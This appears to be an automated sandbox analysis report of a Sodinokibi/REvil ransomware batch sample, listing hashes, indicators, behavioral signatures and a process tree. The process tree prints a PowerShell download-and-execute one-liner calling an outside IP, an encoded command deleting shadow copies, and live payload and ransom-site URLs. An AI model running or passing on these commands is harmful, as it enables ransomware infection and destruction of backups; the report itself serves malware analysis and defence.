Analysis
-
max time kernel
38s -
max time network
37s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
07-06-2020 11:10
Static task
static1
Behavioral task
behavioral1
Sample
0c8fe037f03d1ce50314d43d98fbb194.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
0c8fe037f03d1ce50314d43d98fbb194.bat
Resource
win10v200430
General
-
Target
0c8fe037f03d1ce50314d43d98fbb194.bat
-
Size
219B
-
MD5
7ade68e5f45f65e5f0d80987ec07fe12
-
SHA1
ad4667dfd46bd31108df3355378d115891af37b4
-
SHA256
bb6e5707ed0e890b78840f7baf4ddc06662c752d1db3c0b7f510db84c544a44f
-
SHA512
24c287f1306c94c85824f19d7285525afc0dad378975bbf1b92fd4b6217cfb3f33f0c2f98634cc8b2d9a65af5fbd8ad3cc1ddfcec1af86a97bfdf3d84f6f0a7a
Malware Config
Extracted
http://185.103.242.78/pastes/0c8fe037f03d1ce50314d43d98fbb194
Extracted
C:\a718494f64-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E93CD2D66E9B0E2E
http://decryptor.cc/E93CD2D66E9B0E2E
Signatures
-
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1552 powershell.exe 1552 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 34 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\OptimizeNew.wvx powershell.exe File opened for modification \??\c:\program files\ResumeMount.ogg powershell.exe File opened for modification \??\c:\program files\UnlockUndo.mpeg2 powershell.exe File opened for modification \??\c:\program files\UnprotectEnable.png powershell.exe File opened for modification \??\c:\program files\UnregisterWait.docx powershell.exe File created \??\c:\program files\a718494f64-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\a718494f64-readme.txt powershell.exe File opened for modification \??\c:\program files\SendSubmit.avi powershell.exe File opened for modification \??\c:\program files\RestoreTest.temp powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\a718494f64-readme.txt powershell.exe File opened for modification \??\c:\program files\PingStep.ini powershell.exe File opened for modification \??\c:\program files\ProtectRename.xps powershell.exe File opened for modification \??\c:\program files\RestoreDebug.ogg powershell.exe File created \??\c:\program files (x86)\a718494f64-readme.txt powershell.exe File opened for modification \??\c:\program files\ConfirmResize.mpv2 powershell.exe File opened for modification \??\c:\program files\MeasureEnter.mov powershell.exe File opened for modification \??\c:\program files\SearchTrace.midi powershell.exe File opened for modification \??\c:\program files\SwitchGet.crw powershell.exe File opened for modification \??\c:\program files\AddDeny.xps powershell.exe File opened for modification \??\c:\program files\HideSend.xht powershell.exe File opened for modification \??\c:\program files\InstallClear.xls powershell.exe File opened for modification \??\c:\program files\TraceUpdate.emf powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\a718494f64-readme.txt powershell.exe File opened for modification \??\c:\program files\ApproveSwitch.wm powershell.exe File opened for modification \??\c:\program files\ConnectWatch.mpeg3 powershell.exe File opened for modification \??\c:\program files\RestoreRequest.rar powershell.exe File opened for modification \??\c:\program files\SkipDisable.M2T powershell.exe File opened for modification \??\c:\program files\BlockReset.txt powershell.exe File opened for modification \??\c:\program files\InvokeApprove.png powershell.exe File opened for modification \??\c:\program files\ReadDeny.rm powershell.exe File opened for modification \??\c:\program files\TraceRepair.otf powershell.exe File opened for modification \??\c:\program files\CloseOpen.m3u powershell.exe File opened for modification \??\c:\program files\ConvertRevoke.MTS powershell.exe File opened for modification \??\c:\program files\DisableJoin.html powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\z6bh422b7ed5g.bmp" powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1012 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1512 wrote to memory of 1012 1512 cmd.exe powershell.exe PID 1012 wrote to memory of 1552 1012 powershell.exe powershell.exe PID 1012 wrote to memory of 1552 1012 powershell.exe powershell.exe PID 1012 wrote to memory of 1552 1012 powershell.exe powershell.exe PID 1012 wrote to memory of 1552 1012 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1012 powershell.exe Token: SeDebugPrivilege 1012 powershell.exe Token: SeDebugPrivilege 1552 powershell.exe Token: SeBackupPrivilege 1764 vssvc.exe Token: SeRestorePrivilege 1764 vssvc.exe Token: SeAuditPrivilege 1764 vssvc.exe Token: SeTakeOwnershipPrivilege 1012 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1012 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\0c8fe037f03d1ce50314d43d98fbb194.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/0c8fe037f03d1ce50314d43d98fbb194');Invoke-NIZOHWYRLEXH;Start-Sleep -s 10000"2⤵
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
PID:1012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1764